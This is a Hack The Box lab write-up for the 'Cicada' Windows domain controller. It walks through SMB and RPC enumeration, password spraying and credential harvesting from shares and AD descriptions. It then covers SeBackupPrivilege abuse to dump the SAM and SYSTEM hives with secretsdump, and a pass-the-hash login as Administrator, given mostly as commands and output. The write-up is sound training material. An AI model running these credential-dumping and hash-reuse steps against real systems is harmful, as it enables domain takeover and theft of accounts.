Hack The Box Write-Up Cicada
About Cicada
In this post, I’m writing a write-up for the machine Cicada from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Cicada is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
Foothold
The portscan with Nmap shows some interesting opened ports on this machine, like 445/tcp (SMB). With the GUEST user account we can read the file Notice from HR.txt. This file reveals the default password that’s being used for new hires.
User
After enumerating the user accounts on this machine via rpcclient we checked the default password on the found user accounts, and found that this default password works for the user michael.wrightson. After running Bloodhound we found the password for the user account david.orelious in the description field in the Active Directory. This user account has permission to access the DEV share. This share holds the Backup_script.ps1 with the password of the user account emily.oscars. This user has permission to access the machine via WinRM to read the user flag.
Root
emily.oscars has the SeBackupPrivilege. After using this privilege to read the root.txt. After downloading the SAM and SYSTEM files to our machine, we can dump the hashes from the SAM. With the password hash of the user account Administrator we can connect with WinRM to the machine with this user, to have the highest privileges on the machine.
Machine Info
| Machine Name: | Cicada |
| Difficulty: | Easy |
| Points: | 20 |
| Release Date: | 07 Nov 2020 |
| IP: | 10.129.231.149 |
| Creator: | theblxckcicada |
Reconnaissance
Portscan with Nmap
As always, we start this machine with a portscan with Nmap.
1
nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149
The results of the Nmap portscan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST
Nmap scan report for 10.129.231.149
Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-19T18:24:48
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds
The results of the Nmap scan reveal some open ports on this machine. According to the open ports, this machine acts as a Domain Controller with an Active Directory. The name of the machine is CICADA-DC.cicada.htb. The open SMB port 445/tcp is an interesting port to dive into in our enumeration process. Also, the open RPC port 135/tcp and Kerberos on port 88/tcp caught my eye. These ports are default open on a Domain Controller and useful for enumeration.
Enemuration
Enumerate SMB
Let’s start with enumerating SMB. After trying, we found out that we could connect with the GUEST user account to SMB and get a list of the shares.
1
smbmap -H cicada.htb -u "guest" -p ""
The shared folder HR is readable with the GUEST user account.
1
2
3
4
5
6
7
8
9
10
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Let’s connect to the HR shared folder.
1
smbclient //cicada.htb/HR -u guest -p ""
This share has one file with the name Notice from HR.txt. We can download this file to our machine and try to read the contents.
1
2
3
4
5
6
7
8
9
10
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 439288 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)
Now we are able to read the contents of this file.
1
cat Notice\ from\ HR.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Nice! We found the default password: Cicada$M6Corpb*@Lp#nZp!8. The next step is to get a list of user accounts that are listed on this machine and try this password for each account. I hope we can get lucky.
Enumerate user accounts
Let’s connect with the GUEST account with the rpcclient to the machine and let’s see if we can find some user accounts.
1
$ rpcclient --user GUEST --password="" cicada.htb
Let’s see if we can lookup the current user to a SID so that we have the base SID for this environment.
1
2
3
4
5
6
rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)
We found three user accounts. So, with the current user we can enumerate the RID’s to find out which user accounts are listed on this machine. Wrote a small bash script to enumerate the users based on their RID.
1
2
3
for i in $(seq 500 4000); do
rpcclient --user "GUEST" --password="" cicada.htb -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep -v "CICADA";
done
After running the script, we found the following usernames:
1
2
3
4
5
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Initial access
Access to Michael Wrightson
After some testing with smbmap we found that the default password works for the user michael.wrightson.
1
2
3
4
5
6
7
8
9
10
11
12
smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
root@htb-vbpxy0fxms:/home/t13nn3s/my_data#
First tried to establish a WinRM connection with this machine with the user michael.wrightson, but he has no permission.
Enumerate with Bloodhound
Since we have credentials to authenticate against the Active Directory we can run Bloodhound.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S
The user account emily.oscars is a member of the group REMOTE MANAGEMENT [email protected]. This is interessting because members of this group has permissions to login with Remote Desktop Connection of with PowerShell Remote to the machine.
After further analysis of the members of the group [email protected] we found the password aRt$Lp#7t*VQ!3 in the description in the Active Directory that belongs to the useraccount david.orelious.
Access SMB as David Ourelious
We already know that there are more SMB shares listed on this machine. Let’s see if the account david.orelious has access to a different share.
1
smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
This account has read only permissions to the DEV share.
1
2
3
4
5
6
7
8
9
10
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Let’s connect to the DEV share.
1
smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'
We found an interesting file Backup_script.ps1. Let’s download this script to our machine.
1
2
3
4
5
6
7
8
9
10
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)
Contents of the script.
1
2
3
4
5
6
7
8
9
10
11
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
We found the password for the user account emily.oscars in this script. We already know that this user account is member of the REMOTE MANAGEMENT [email protected].
Evil-WinRM access as Emily Oscars
Read the user flag
Let’s try to establish a connection with Evil-WinRM with the machine.
1
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
We have the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/30/2024 9:29 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
Privilege Escalation
Enumeration
The user account emily.oscars has the SeBackupPrivilege. The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We can download the files from this Github Repo: https://github.com/giuliano108/SeBackupPrivilege, and upload the files to the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
Read the root flag
Import the PowerShell Modules and copy the root.txt flag to own CICADA.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a
We have read the root flag. That’s nice, but that’s not the same as own the machine. So, we still have to get to privilege escalation.
Download system and sam
Download the SYSTEM and the SAM to our machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
With secretsdump we can dump the password hashes.
1
2
3
4
5
6
7
8
9
10
impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
With the password hash from the useraccount Administrator we are able to esatblish with Evil-WinRM a connection to the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
─[eu-dedivip-1]─[10.10.14.38]─[t13nn3s@htb-j5kiqrdxs4]─[~/my_data]
└──╼ [★]$ evil-winrm -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We have owned CICADA!
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!
Happy Hacking :-)